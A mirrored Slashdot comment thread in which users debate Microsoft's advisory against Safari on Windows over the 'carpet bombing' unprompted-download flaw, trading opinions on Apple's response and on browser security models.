Slashdot Mirror
Microsoft Urges Windows Users To Shun Safari
benjymouse writes "The Register has picked up on a recent Microsoft security bulletin which urges Windows users to 'restrict use of Safari as a web browser until an appropriate update is available from Microsoft and/or Apple.' This controversy comes after Apple has officially refused to promise to do anything about the carpet bombing vulnerability in the Safari browser. Essentially, Apple does not see unsolicited downloads of hundreds or even thousands of executable files to users' desktops as being a security problem." Now while downloading a hundred files to your desktop won't automatically execute them, Microsoft's position is that a secondary attack could execute them for you.
"Now while downloading a hundred files to your desktop won't automatically execute them, Microsoft's position is that a secondary attack could execute them for you."
With hundreds of files on your desktop, what are the odds you'd hit one when you are just blanking out a selection, or deleting them, or frustratingly smack your mouse for [whatever reason]
The irony level in this situation is simply astounding. Secondary attack can cause execution of said downloaded binaries? What about all that malicious content that Internet Exploiter happily executes for the user with nary a warning or confirmation?
Time for bed.
Talk about the stove calling the kettle black.
... said the fox to the hen, "Here, come and sleep in _my_ house instead..."
Finally, something I we can agree on.
ok I'm the curious type so I made a test on my server, with the provided example.
Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.
Not for me? Safari 3.0.4 running on Mac OS X 10.5.2 renders a web page of numerous blank empty boxes. Nothing was placed in any local folder. Is anyone else able to duplicate this?
I work for the Department of Redundancy Department.
So just how does Safari react when you go to Microsoft's update website?
Take Nobody's Word For It.
One other thing that hit me immediately... MS: "Omigod they found a BUG in our competitor's web browser! Because we're very concerned for our users' security, we urge you to stop using that browser immediately! Users should NEVER use a buggy web browser! (unless it's explorer)"
I work for the Department of Redundancy Department.
Microsoft is saying that Windows is a very different sort of environment. You can't allow convenience on Windows - it's just not secure enough.
Wow. Have to admit I'm on Microsoft's side here. Let's see:
It's not just the vulnerability that hurts, but the compund bullshit caused by Apple's -- rather arrogant -- actions. This reads like something Microsoft would do!
Also, vulnerabilities in Apple software (and this bug affects both Windows and Mac), make all *nix stuff look bad: watch MS shills roll out the 'Microsoft software is only vulnerable because hackers target it' FUD in short order.
Posting as AC due to Apple fanboy-mods. Modding this down doesn't stop it being the truth.
A list of actual drive-by vulnerabilities in current Internet Explorer (name-calling went out of vogue when you reached the age of 15, man. You are at least 15, right?) that allow for code execution on the client to substantiate your claim, please.*
Now if you want to point fingers, visit that Dhanjani link and read about the vulnerability he's not disclosing, as a courtesy to Apple; "The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system [...] it is a high risk issue affecting Safari on OSX and Windows". There hasn't been an update to that in the past 2 weeks, implying that it has not yet been fixed.
The Slashdot headline is pure flamebait and you took it.
As much as I hate M$ and all it stands for, I agree Safari shouldn't be used. Its bad enough that Apple nags me to install Safari and Itunes on my Windows computer whenever there is a Quicktime Player update.
but how can Safari download the files without user consent (and the fact that asking user whether to download the file is a feature request :-O). I haven't seen any other browser behaving like that.
They called me mad, and I called them mad, and damn them, they outvoted me. -Nathaniel Lee
Its not the quallity of the links (websites) that matter, its the quallity of what is reported at the destination of the URL. I'll swim through a sewer to get my food if I have to.
What do you have aginst The Register? or Blogs? If Slashdot themselves use Journals, and User Postings, is that not a blog of sorts in the first place?
That guy appears to be the one who discovered the vulnerabilities and reported them to Apple.
Do you really think Slashdot shouldn't link to primary sources?
-Esme
Hi all I'm in the uncomfortable position of agreeing with Microsoft on this issue. If a browser (any browser) allows a website to randomly download files without the user's explicit permission, regardless of the location, it is a security issue in my opinion. Having said that, I take issue with Microsoft's security advisory. The only thing they say is: "What causes this threat? A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a userâ(TM)s machine without prompting, allowing them to be executed." OK, but how about telling us the how or why? Since it is a direct contributor which causes the blended threat, I don't think it's asking too much to want to know exactly "how the Windows desktop handles executables" and how that contributes to the threat. http://www.evden-eve-nakliyat.name.tr/
Supposedly it does this on OS X as well, but the a comment above says it's not doing it, but that as an aside..
If it -does- do this on OS X, then it is called a convenience?
What is the convenience in having a folder automatically stuffed with files, downloaded without your say-so, exactly? Regardless of whether they can then be arbitrarily executed by a second program, or whether the user can execute them without a warning dialog popping up or not, etc. What, in your opinion, is convenient about it?
I find alt+click in Firefox convenient to download a file that I want without clicking on it and then going through the download dialog. I find it even more convenient that Firefox -asks- me if I want to download a given file if some crazy redirect page pointed me to one; gives me the opportunity to say "Hell no!" before the file even ends up on my drive.
But our opinions on convenience may differ.
Microsoft urges users to shun anything that they don't sell.
This is a story?
* Carthago Delenda Est *
This is a reasonable warning that would be applied as is to any other app. Apple leaving this unpatched is feeding fuel to fire, that started with Quicktime vulnerabilities and the sudden uptick of Mac vulnerabilities over the last few years, that Apple is no more serious or maybe capable about security than any other company.
/LabMonkey09
Well, let's see:
Oh, I see. So, the auto-download feature doesn't "properly" tag them like IE7 does, so users might accidentally execute a program without being first informed it was downloaded? Gosh. Sounds less like a security vulnerability than MS blowing smoke.
But, wait:
Oh, well now it's sounding more like it'll be downloaded *and* executed automatically. Of course, if that's the case, half the "security vulnerability" is in Window's automatically executing things. If not, MS is simply lying..unless they have proof that Safari is the one causing said automatic execution.
However you spin it, Safari allowing carpet bombing is an annoying feature (much like pop-unders are an annoying feature). But it's not a security vulnerability. Labeling it as such is bullshit.
Does that mean you should use Safari regardless? Personally, I'd say no. Carpet bombing is too annoying of a feature to tolerate. But, then, I'd imagine Windows has too many annoying features for a lot of Mac users. It'd be just as asinine for Apple to issue a security advisory to shun Windows.
Eurohacker European paranoia, gun rights, and h
One hundred rounds does not constitute firepower.
One hit contitutes firepower. (Gen. Merritt Edson, USMC)
If a browser (any browser) allows a website to randomly download files without the user's explicit permission, regardless of the location, it is a security issue in my opinion.
It's a minor issue compared to a number of others that ALL browsers on Windows have. If Microsoft is serious about security then they need to:
1. Immediately transition away from ActiveX, with as short a timeframe as possible.
2. Replace ShellExecute() with something similar to UNIX's exec(). They already HAVE the code, in the POSIX subsystem.
3. Eliminate "security zones" as a security model - there must be no circumstance in which the location of an object named in a web page automatically grants it privileges.
4. Provide an alternate API for browsers to use to find and run helper applications that is not based on the desktop helper application bindings.
All four of these are far bigger problems than having files downloaded without a prompt. Not only do they all provide paths to direct execution of untrusted code without user interaction, but they have all BEEN used for that purpose hundreds of times over the past decade.
I am not sure it's possible to implement a really secure browser on Windows without completely bypassing all of Microsoft's recommended APIs.
Why does MS and Apple put huge amounts of money into developing browsers when Firefox exists? IE and Safari generate zero revenue for the company since they give the software away, so it can't look too good on the balance sheet.
I can only think that it's some kind of NIH syndrome, or content-control-freakery, or that if they suddenly stopped making a browser and said 'oh flip it, Firefox wins' that confidence in the corporation (and hence share price) would nose dive.
Any other ideas?
You can tell Safari to put downloaded files where ever you want.
So they don't have to be on the desktop
"restrict use of Vista as a GUI until an appropriate update is available from Microsoft"
davecb5620@gmail.com
Works fine here.. you might not have had execute permissions set on your server for the cgi file... Here's an active test of the sample code ("Only" downloads 4 harmless files)
http://appleguru.org/webkit_test/
appleguru.org
And the /. users still don't RTFA...
That 'some guy' was the person that discovered the vulnerability and sent it to Apple.
How much more authoritative do you want it w.r.t. the bug in question?
The Register itself may not profile itself as a NYT-level news site, but they do occasionally have good articles.
"I was in love with a beautiful blonde once, dear. She drove me to drink. It's the one thing I am indebted to her for."
On Mac OS X this isn't really a problem - at least not since Leopard. When things download in Safari it's obvious to the user, and only certain file types are considered safe to open right away, so there's no automatic execution of application bundles or .command files. In Leopard, the first time you try to open or execute a download you get a dialog warning you that the file is an internet download. You can choose to open it anyway, or you can choose to view the file's source web page. If the file resides on a disk image, you continue to get the warning every time you open the file until you check the box indicating that the disk image is safe.
-- thinkyhead software and media
The reasons are simple:
1) The current version of Internet Explorer (7.0) is actually a pretty decent web browser, and works reasonably well for average users.
2) Firefox 3.0, which should arrive some time in June 2008 in the final version, will get plentiful third-party support and the revised memory management has drastically reduced the memory "footprint" of the browser.
Why bother with another web browser that is not really a viable alternative to IE 7.0 and the upcoming Firefox 3.0?
There, no no one has to worry
Sorry, could not resist.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
-The Editors
But Safari places them on the desktop by default. This is the key problem, and in fact a good number of security vulnerabilities woudn't be an issue if it weren't for the fact that the majority of users stick with the default settings.
And you can't make the argument that the only people downloading Safari are power users anymore - if you have an iPod, odds are that Apple Update has pushed Safari to your machine.
If Hitler makes a case that you shouldn't kill jews- it doesn't mean his argument's invalid just because he's Hitler.
isn't the main reason for Safari being on Windows is so that developers can test web pages for iPhone compatibility?
OTOH, there's the whole thing with Apple Update on Windows pushing Safari at you, so that must no longer be true.
Hail Eris, full of mischief...
E pluribus sanguinem
Thanks for the link. Konqueror on GNU/Linux brings up a save file dialog. Safari on OSX does the same. It seems like the problem is not with the browser.
http://www.mininova.org/tor/1340337
Move along, nothing to see here.
(SEED DAMN YOU)
I keep reading comments like "well in OSX blah blah" or "Windows just isn't secure"...ok that's informative, but it's really beside the point. I'm willing to bet that Apple is not addressing this fix because it's good PR to the uninformed. If the user perceives that it's Windows' fault then they might well go all Mac since they are already using Safari...Anyhow, I think that along with the PR bit, Apple doesn't want to admit that there is a huge gaping hole in their web browser, which raises a question...is Apple ready for a bigger market share? Microsoft may have security holes, but you can almost bet they will be patched in a timely matter. With Apple, from my experiences, it takes quite a while for updates to hit the servers. I don't really see this as controversial at all, Apple needs to patch their product, Microsoft has an obligation to protect their users...I would expect Apple to do the same with IE if Microsoft out right REFUSED to patch it. I know there is a lot of Microsoft hate here on Slashdot...but this is pretty obvious in that it's Apple being the "bad guy" here.
Anytime Safari downloads an executable in OS X it pops up a warning dialog informing the user that Safari is downloading a potentially dangerous executable, and then one has to click Cancel or Download in that dialog. So no, it isn't a problem on OS X, just Windows. I wonder why they don't give Win users the same protection?
Caveat Utilitor
On one hand, who gives a shit. On the other hand, Apple has released software that was significantly less user-friendly on Windows for years and years. I've always hated Quicktime. iTunes is a stupid beast. I don't see why it wouldn't be the same with Safari on Windows.
Now I'm on a Mac, and all that shit works just fine (though I'm switching to Songbird as soon as it's stable enough for me). But it is curious that Apple pretends that a problem with something they designed for Windows is no thing at all.
I can't shake the image of the Mac and PC guys involved in an epic sword fight. Of the gay variety.
Please stop stalking me, bro.
I think that you were projecting your own limited assumptions about how this would be handled onto me. Actually, what I had (vaguely) in mind was a message that appears unobtrusively; either at the top of the screen (a la popup-blockers), or a new pseudo-page that contains the link. If the user *really* wants the file, it's easy to download it, but it doesn't get in the way when they don't. If a dialog box comes up, people do not read it, and they automatically try to cancel. I think a better solution [..] if some script decides to dump a hundred little files in there, it's OK, or at least better than filling your desktop. No, that's only slightly less bad than the current situation. It still gives some remote computer the ability to fill your hard drive with crap and (as others suggested) leave that open for another exploited vulnerability to execute. There's no point in automatically downloading such files in the first place, since in the majority of cases, people wouldn't have wanted that anyway.
"Slashdot - News and Chat Sites Deviant". (Click "homepage" link above for details).
Probably hasn't been larted enough, guv'nor ... give me a minute to charge up the "insulation tester."
http://www.theregister.co.uk/odds/bofh/
Feel free to start listing them now. I'll let you know how many of them still work.
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
Some drink at the fountain of knowledge. Others just gargle.
IE on Vista runs in a sandbox which no other browser on any OS does. So can you tell us about one, just one disclosed known vulnerability what lets IE(patched with latest windows updates) execute malicious content without warning? Or are you full of hot air? PS: (I use Opera)
This space for rent.
It certainly opens the possibility for some "fun" denial of service attacks. How many files do you need on your desktop before explorer.exe croaks? I presume the number is well under 100,000?
________
Entranced by anime since late summer 2001 and loving it ^_^
Alright twitter, I won't call you names. Just give me one, just one link that can exploit a vulnerability that will exploit a fully patched IE 7 on Vista. Or are you just going to continue ranting about exploits in Dos 6.22 as well?
This space for rent.
In related news, Microsoft warns against allowing employees using Windows from eating cheeseburgers. The user could become fixated upon the tasty pickle and hackers could sneak into the work place and steal data from your computer.
From the linked article "Apple does not feel this is a issue they want to tackle at this time. In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion: ...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.
[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue]."
Shun the nonbeliever! Shun! Shuuuuuuuuuunnnnnnnaaaa...
You are forgetting that if you hit upon a site that plasters your desktop with icons you'll be busy for quite a while cleaning up the mess. Remember tar bombs? The possibility of your disk space running out and the desktop having to render millions of icons is a bit disquieting too, especially of low-end systems.
...during periods when security bugs have been exposed in Internet Explorer. I guess the Ballmer Doctrine is that problematic Ms products must be endured while non-Ms products should be jettisoned at the first sign of problems.
I don't know why corporations bother, but having used Firefox and Safari (and IE, and Konqueror on Linux, and even Lynx) I must say that I'm glad that other browsers than Firefox exist. Firefox is extremely slow to start up, hogs memory like crazy, is clunky to use, is slow when browsing and doesn't have as good a JavaScript debugger as Safari. on the other hand, Firefox scrolls more smoothly. But still, on the whole I prefer Safari over Firefox. Of course both applications have a major flaw: they refuse to work with the system theme. Contrast this with Konqueror, which is almost identical to Safari in many ways, but does look like all other apps. Just waiting for the Windows version to become stable enough to use it as my main browser.
This space for rent.
This space for rent.
Teacher, may I go to the bathroom?
What if Apple's security team had said no?
[Fuck Beta]
o0t!
Oh I'm sure they see the problem. For Microsoft. First they spam the bundled download of safari and then ms windows looks less secure? Tell me, why would they hurry and fix it?
Why should Apple fix a vulnerability in their browser that only affects Windows if it only makes their for-profit hardware division look better?
By not fixing this, they can say "Oh look, another Windows vulnerability," and people won't look too closely and realize that it's actually something Apple themselves could fix.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Every patch tuesday, M$ publishes a small fraction of current exploits. It's amazing that anyone could be modded insightful for saying that IE on Windoze has no current security holes in an article about M$ security failing.
Something that also effects OSX...
I read that as saying that the suggestion is not being treated as a security issue, but an interface issue.
That doesn't mean that the original issue is not being treated as a security issue. I would suspect that the exploit itself is considered a security issue, and a real fix (not a UI change) will be issued.
According to Aviv Raff, the security researcher who reported this to Microsoft, the Safari vulnerability is combined with an old Internet Explorer vulnerability.
I had this experience with Safari in OS X 10.5.3: I went to a web site, forget which one, and got injected. I could tell monkey business was going on. My downloads folder started to dance, and I went to it just as an .exe plopped into it.Hmm. A danger if I was on my Intel computer, running Parallels. Since double-clicking on the exe would have launched Windows. And then run the exe and screwed up that virtual machine. So I'd have to go back to the snapshot I made when I made the installation. And trash the virtual machine that got hacked.
But I was on the G5, so it was like getting a marriage proposal from a Venusian.
It's so nice, getting security lectures from Microsoft.
...That the company (Microsoft) that universally denies, downplays, delays and diddles (sorry, needed another "d" word) regarding every-single-one of their OWN security vulnerabilities (even when they DO allow immediate execution of arbitrary code), has, IN LESS THAN 24 HOURS taken it upon themselves to suddenly act like the world's security cop?
You'd think it was a DRM backdoor in Windows we were talking about!
Now how about the same response time on the 10^7 security holes in every version of Windows, even up through Vista?
... after trying safari out for about 15 minutes when it was first released for windows, i advise windows users to shun safari simply because its completely shit, like the rest of Apple's windows software.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
I finally figured it out! I think they spend all their time on Slashdot modding anti-Apple posts as offtopic.
This space for rent.
Yeah their job is to ensure all apple software for windows sucks enough that only mac users would want to use them.
That's a stretch. If Apple continues their bad programming on the PC side, they'll have a hard time convincing people to switch to Apple. I've heard from at least a dozen people that iTunes sucks and Quicktime is evil and if those basic things suck so badly, why would they want to switch to a Mac? Granted, Mac products on a Mac are pretty sweet, but Mac apps on the PC are pretty awful...EVEN when I find most apps on a PC pretty awful, Apple REALLY stinks them up (as if they just make them as an afterthought, which is very un-Apple).
What if I write a browser for OS X that doesn't mark the file as dangerous? I bet Finder will execute it with nary a warning.
Noting gets executed on unix unless the user or a program sets the execute bit. Microsoft does it's own thing, which everyone told them was wrong and has proved inadequate. The first mechanism was none, so anything with ".exe" at the end would run as root. Now they have some other "internet" bit and a UAC which they admit was designed to annoy their customers. The root cause is that the OS itself does not have a sane method of determining what can be executed.
I have little faith in The Register's reporting because they don't seem to have tried it for themselves. Konqueror does not download things without asking the user and the GP claims the same. You would think that Register staff would have tested this for themselves when they ran the last article and got that comment about warning messages. The whole thing is half baked Microsoft FUD passed off a news.
So I was using that IE thing and it went like: "whassup with this file?", you know, like my Mother! Then I tried this cool safari thing and it went like "Whoosh!" and then I clicked and clicked and clicked and now I'm like wondering where my essay went, oh no!
This really is rather disingenuous, while Safari on OSX will allow mass downloads the files won't litter your desktop and executables wont be launched automatically, making this problem little more than a possible annoyance. Even if by some miracle an executable was launched automatically, OSX issues a prompt the first time an untrusted application is launched.
Honestly I would have thought that UAC in Vista would do the same type of thing, preventing this from becoming a security issue.
Cleaning up from a mass download is incredibly easy. Any reasonably computer literate person should be able to remove these files easily (even if they number in the millions) with a single command from the finder, from the terminal or from automator.
Windows users should be able to clean up just as easily from the command line so seriously, what's the big issue here? Microsofts comments reek of anti-competitive bullshit.
Thank you,
From the cult of the open mind.
Odder is one of Twitter's new sockpuppets.
Heh, obligatory link to Get Firefox :)
It can really be a serious vulnerability, most default windows setups hide the .exe of executable filenames, with this I could easily place a bogus "My computer" icon that executes my favorite rootkit.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
and I download to my desktop. You're hereby banished to notcoolville.
I use OSX occasionally and don't have a problem with Apple apps running on Apple's OS. Apple apps running on Windows are another matter entirely. From the earliest versions of Quicktime for windows (Why do you think there's Quicktime Alternative?) to the latest version of Safari, I have yet to see one piece of Apple authored Windows software that doesn't make me want to gouge out my eyeballs with a spork. Don't even get me started on iTunes! It isn't just Apple's complete unwillingness to bend the Apple way of doing things to accomodate the standards of other OS's. Their Windows software is just plain bug-riddled crap.
Is Apple really just incompetent at writing apps for other OS's? They've beeing doing it long enough that they really ought to be able to do a decent job by now. Instead, I think Apple trying to make sure that Apple users who migrate to windows and install a familiar Apple app will be scared back into the fold.
That being said, I don't use Safari even when I am using OSX. Firefox may not be the perfect browser, but at least they have decent versions available for OSX, Windows, and Linux. That's something that can't be said for IE or Safari. It's nice to be able to stick to one browser across every OS I use.
i have a mac and barely use safari. firefox is the best browser, in my opinion. Christian Loriau
I guarantee you someone at Microsoft had to bake cupcakes when they found out they could justifiably classify an Apple product as a security risk.
What makes this controversial? It's a company saying their product is better than somebody else's. It happens all the time and the only reason this story made it onto /. in the first place is because somebody at Microsoft said it.
You know who else is constantly claiming their product to be superior? Linux users. It might be true, and I'm not criticizing anybody for it, but if a product claiming to be better than another makes it a bad product, then that would make Linux one and you're going to have to stop using it. If that's the criteria, you're going to be running out of things to use really, really quickly, because everybody does it.
2/10. Try harder.
You have to know the rules to be able to break them.
When a download starts in Safari the 'Downloads' window appears. If you want to prevent a download all you have to do is click. This would be impractical with a hundred downloads, but so would a hundred prompts. Likewise, approving downloads one at a time isnâ(TM)t ideal when you want to download a lot of files. Iâ(TM)d like to see Apple add a delay before the download starts to give users more time to respond. A cancel/prevent all button would also be fun. In the end all Apple really needs to do is change the default download location and this problem becomes a non-issue. Microsofts claims seem to center around the fact that the files end up on the desktop. All in all I think this is rather ridiculous in the light that the user is made well aware of the downloads and can easily stop them. This certainly wont stop me from using Safari or Webkit in general on Windows. On a side-note, there are a number of download managers that take over from Safaris âDownloadsâ(TM) window on OSX. Itâ(TM)s not unreasonable to think this could prevent mass downloads.
If I'm downloading stuff to my Desktop then there is no security problem. Now, uploads are a different matter. Is that what is supposed to be meant here? Me thinks "downloads" doesn't mean what they think it means.
this nation, under God, shall have a new birth of freedom. -- Lincoln, Gettysburg Address
Considering that link says that it's security flaws that have already been fixed that are being targeted, I don't see how that fits what I was asking you for.
As such, Twitter, I'm still waiting. Have to say, kudos for having the balls to reply to me with the username that you copied from mine. I like how you post at -1 with it - that plan really backfired for you, huh?
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
Well, not quite. It might effect greater sales of Macs, which in turn would effect greater Mac OS X usage...
:P
Couldn't resist. Learn to spell next time...?
Oh, you sooooo need to see Cats (and other animals) and Racks!
Apple is just proving how stupid they really are. At all times a software company needs to see the issue from the eyes of their customers. Going to a web site that can turn your desktop into crap without you activly allowing it would most definately be concidered a security problem by any sane user.
.bashrc or .profile or any number of old school ini files windows still activly looks for and parses?
However this clearly *is* a security problem. What if I was on linux and the file uploaded was
The possibility of an attack vector against god knows what preview/display hooks in the OS is only dwarfed by the possibility of execution by an unsuspecting user who assumes programs labled 'MS Word' appearing on his computers desktop are safe to run.
That apple would even bother posting such a rediculous response is only prooves they don't deserve to be taken seriously. The good ole days of 'apple is more secure because no one uses it' are gone forever.
I know some may be embarrassed that I am revealing this crippling exploit, but I just think that it cannot be covered up any longer. I was astonished to discover, after running many, many tests in my parents' basem...secret lab... that all browsers have this horrible bug. Clicking on any link will cause dozens of files to be downloaded automatically!!! That's right: any link you visit on the Web actually causes a complete download of its content to your computer! Think of the unwitting copyright violations! Think of the children! What's worse, these files are not in an obvious location such as your desktop. No, they are stashed away in such cryptic locations as "~/.mozilla/firefox/znf60w9b.default/Cache" .mozilla - is doubly insidious. Any file beginning with '.' is HIDDEN from view, you don't even need to set an extended attribute on it, most utilities are actually TRAINED to hide these files. Many of them have the ability to control all of your softwares! Secondly, 'mozilla' must be a reference to some sort of ancient mythical beast. Perhaps the virus writers are religious and do not wish to invoke the name of G-d, so instead they call him by the epithet "Moz."
Let's analyze these components one by one.
The tilde ~ is an unusual character - many people do not even know its name, so it is difficult for tech support to help you with this over the phone!
The next part -
The next component is obviously gibberish with a seemingly innocent '.default' tacked on for respectability!
And then "Cache" - what is this? Some mispelling of the word "cash?" As in, they want our money as ransom to fix these crippling bugs?
Nay, I say, we must rise up! Rebel against these secretive 'hackers' before they can control our desktop!
Interesting comment here: I didn't bother contacting Apple, as they've told Nitesh that they consider this as an "enhancement request" and will not bother to fix this issue any time soon.
Aviv's smart enough to find an IE exploit to target, but he's not smart enough to understand that because a company doesn't care about a really ineffective denial of service that doesn't mean they don't care about a real problem.
I think you'll find that, if windows does indeed have this feature now, it was copied from OS X.
On my Windows Vista system, I was using Firefox to login to one Gmail account and Safari to login to another. It seemed to work fine, except the sound to the external headphone jack on my Acer laptop kept disappearing. It's a known "feature" on Acer laptops. To get it back, you put the laptop into sleep mode....leave it for at least 5 minutes...then touch a key to bring it back...and sound resumes. But using Safari sees me have to do this every time I use the laptop. Not using Safari means I may have to do it once every couple of months. Since I stopped using Safari a couple of weeks ago, I have not lost sound to my headphone jack. I had come to the conclusion Safari wasn't as good as Firefox. But it is better than MS IE. To me, IE is unfriendly.
Only boring people are ever bored.
XMLHttpRequest was added to IE as a semi-hidden, non-standard "feature." Why? So Microsoft could create a version of Outlook Web Access that acted just like the Windows client--a strong selling point for a product that makes them lots of money.
Browsers render standard Web pages, but they are also render the front ends of proprietary server-based apps. It is in a business's best interest to make sure that browsers do what they want them to. Microsoft and Apple do it by developing and distributing their own browsers. Google and Yahoo do it by supporting Firefox.
Adobe does it by creating plug-ins, which is actually a pretty good metaphor for the browser in the OS. Safari for Windows is a "plug in" on the Windows OS that proprietary environment for Apple's next-gen network apps.
Build a man a fire, he's warm for one night. Set him on fire, and he's warm for the rest of his life.
lol, fine... "Something that affects Safari users on OSX"
Unfortunatly the Posix subsystems exec call just pastes the argv back together with spaces and passes it to the next program (it has to, it runs through the normal Windows API at some point), so this solves nothing on Windows.
I do agree that having the programs do the quoting and splitting is a big security hole. And I hate to admit it (because it makes it a pain to do some command lines on Unix and I have often said it's something Windows did right) but the globbing being done by the calling program is also a good security idea, some stupid browser could be convinced perhaps to run "rm" with the file named by the web page and it sent "*"
Also, if that's the case, apologies. Shows what I get for believing a Slashdot summary.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
> The worst thing that could happen from this is that your download area
> gets littered with superfluous files and you can fix that in seconds!
Howsabout a malicious website drops ***ONE*** malicious executable on your desktop? Let's say the malicious executable has a faked-up IE7 icon. Next Monday, the user starts up Windows, wants to browse "teh Interweb", clicks on the familiar IE7 icon on the desktop, and... oops. A well-coded malicious executable could even spawn the real IE7, to try to cover its tracks.
Windows has different security conventions than OSX. Apple needs to hire real Windows developers, rather than merely re-compiling Safari to a different target OS.
I'm not repeating myself
I'm an X window user; I'm an ex-Windows user
Because archives and disk images are extracted / opened by default in Safari on OS X? Same for videos and music files.
So if the extract utility accept full path (I doubt it does) for filenames you could extract whatever files on top of whatever files, you could say bring up a disk image which say iTunes or whatever and someone who don't think that much may execute it, if it's possible to exploit itunes or quicktime thru weird data in the file which are played you could throw over a file which exploits that.
And so on, maybe not likely scenarios but whatever, I don't want thousand of files in my download folder to begin with, even if I won't execute them.
If you visit dodgy web sites and don't know how to secure your system you deserve all you get.
It seems that the real problem this is supposedly tickling, that made Microsoft go gaga, is ... Internet Explorer and security zones and active content (oh my!).
Which has been the #1 security problem in Windows since 1997, and I'm still boggled that Microsoft didn't back out the whole concept by 3Q98 or so. It's like having a car that's got door and ignition locks that only work if there's someone sitting in the driver's seat.
"Security Advisory (953818) does not refer to vulnerability in either Safari or Windows," Tim Rains, security response communications lead for Microsoft said in a statement sent to InternetNews.com.
"Rather, it describes a blended threat in which files may be downloaded to a user's machine without prompting, allowing them to be executed. This results from a combination of the default download location in Safari and how the Windows desktop handles executables."
What this tells me is that this is almost certainly another variant on the futile battle with reality that Microsoft has engaged in ever since they introduced "security zones" as an attempt to mitigate their fundamentally insecure "active content" security since 1997.
The rights granted an object MUST NOT be based on the location of the object (with or without such additional features as security dialogs, certificates, and whatnot), they MUST be granted by the component responsible for introducing them into the system, and ONLY by a request by the user... not in response to a request by the object.
That is, you MUST NOT be able to have an object in a web page executed outside a hard sandbox (eg, the kind of restricted scripts that web pages may contain) without a user explicitly downloading it AND explicitly executing it. The alternative was something unheard of before 1997, it was a joke (the "good times" virus, for example), the rare cases where someone found a way to make it happen (the Internet Worm, the XMAS TREE worm, the ghostscript virus) were identified as flaws, bugs, security holes, and unambiguously fixed.
Microsoft introduced the idea that a "trusted zone" could exist where execution could be implicitly allowed, by visiting a web page, opening a folder, even reading email! This led to a flood of worms in the last few years of the 20th century, and for whatever reason Microsoft... rather than backing out of this model... has attempted to come up with some combination of tricks to fix it. It can't be fixed, alas, and until Microsoft admits it or people stop using Microsoft software security is going to remain problematic... ANY application on Windows can unintentionally break Microsoft's undocumented and rapidly changing trust boundaries and introduce another avenue of attack.
Worse, other companies... including Apple and Mozilla... have followed Microsoft's lead. All browsers currently have design flaws like this, though none take it to such an extreme and only Microsoft seems insistent on carrying the mistake all the way to the desktop.
My GF came across one of these malicious file bombing sites and apparently I found it a little late. I use(d) Safari & Time Warner Cable Broadband Services which now makes us pay by the amount of bandwidth used (TX). I found a little over 17GB sitting on my system and a hell of a bill from Time Warner's new bandwidth limitations.
Any chance I can get out of paying these overages?